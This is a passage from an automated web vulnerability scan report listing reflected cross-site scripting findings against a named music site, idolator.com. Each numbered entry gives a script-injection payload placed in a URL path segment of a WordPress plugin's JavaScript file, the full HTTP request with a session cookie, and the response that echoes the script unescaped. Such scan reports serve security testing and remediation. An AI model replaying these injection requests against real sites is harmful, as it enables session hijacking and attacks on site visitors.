Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35850
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/ifb2c73f\"><script>alert(1)</script>40fd068c3fa/audience-science.html" />
...[SNIP]...

4.135. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9e7"><script>alert(1)</script>94f63fa15e9 was submitted in the REST URL parameter 1. This input was echoed as ed9e7\"><script>alert(1)</script>94f63fa15e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contented9e7"><script>alert(1)</script>94f63fa15e9/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contented9e7\"><script>alert(1)</script>94f63fa15e9/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.136. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a1b"><script>alert(1)</script>3876fc04fe was submitted in the REST URL parameter 2. This input was echoed as 83a1b\"><script>alert(1)</script>3876fc04fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins83a1b"><script>alert(1)</script>3876fc04fe/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:15 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36002
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins83a1b\"><script>alert(1)</script>3876fc04fe/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.137. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619b8"><script>alert(1)</script>b699cc3cd3e was submitted in the REST URL parameter 3. This input was echoed as 619b8\"><script>alert(1)</script>b699cc3cd3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets619b8"><script>alert(1)</script>b699cc3cd3e/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets619b8\"><script>alert(1)</script>b699cc3cd3e/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.138. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3319d"><script>alert(1)</script>8214a7bd60d was submitted in the REST URL parameter 4. This input was echoed as 3319d\"><script>alert(1)</script>8214a7bd60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js3319d"><script>alert(1)</script>8214a7bd60d/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:36 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js3319d\"><script>alert(1)</script>8214a7bd60d/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.139. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51b1"><script>alert(1)</script>fb71d8fe0e8 was submitted in the REST URL parameter 5. This input was echoed as b51b1\"><script>alert(1)</script>fb71d8fe0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.jsb51b1"><script>alert(1)</script>fb71d8fe0e8?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.jsb51b1\"><script>alert(1)</script>fb71d8fe0e8?ver=2.8.6" />
...[SNIP]...

4.140. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed291"><script>alert(1)</script>a64e2c6bb6a was submitted in the REST URL parameter 1. This input was echoed as ed291\"><script>alert(1)</script>a64e2c6bb6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contented291"><script>alert(1)</script>a64e2c6bb6a/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:01 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contented291\"><script>alert(1)</script>a64e2c6bb6a/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.141. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9660a"><script>alert(1)</script>6dd36c39f9b was submitted in the REST URL parameter 2. This input was echoed as 9660a\"><script>alert(1)</script>6dd36c39f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9660a"><script>alert(1)</script>6dd36c39f9b/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins9660a\"><script>alert(1)</script>6dd36c39f9b/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.142. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c210"><script>alert(1)</script>a81def3ac26 was submitted in the REST URL parameter 3. This input was echoed as 3c210\"><script>alert(1)</script>a81def3ac26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets3c210"><script>alert(1)</script>a81def3ac26/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:25 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets3c210\"><script>alert(1)</script>a81def3ac26/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.143. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92dfd"><script>alert(1)</script>5ce5a42979 was submitted in the REST URL parameter 4. This input was echoed as 92dfd\"><script>alert(1)</script>5ce5a42979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js92dfd"><script>alert(1)</script>5ce5a42979/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:38 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36041
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js92dfd\"><script>alert(1)</script>5ce5a42979/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.144. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fef5"><script>alert(1)</script>bb99263f410 was submitted in the REST URL parameter 5. This input was echoed as 9fef5\"><script>alert(1)</script>bb99263f410 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js9fef5"><script>alert(1)</script>bb99263f410?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:50 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js9fef5\"><script>alert(1)</script>bb99263f410?ver=2.8.6" />
...[SNIP]...

4.145. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13af3"><script>alert(1)</script>cc47ae3484e was submitted in the REST URL parameter 1. This input was echoed as 13af3\"><script>alert(1)</script>cc47ae3484e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content13af3"><script>alert(1)</script>cc47ae3484e/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content13af3\"><script>alert(1)</script>cc47ae3484e/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.146. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389d7"><script>alert(1)</script>6059268cfdb was submitted in the REST URL parameter 2. This input was echoed as 389d7\"><script>alert(1)</script>6059268cfdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins389d7"><script>alert(1)</script>6059268cfdb/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
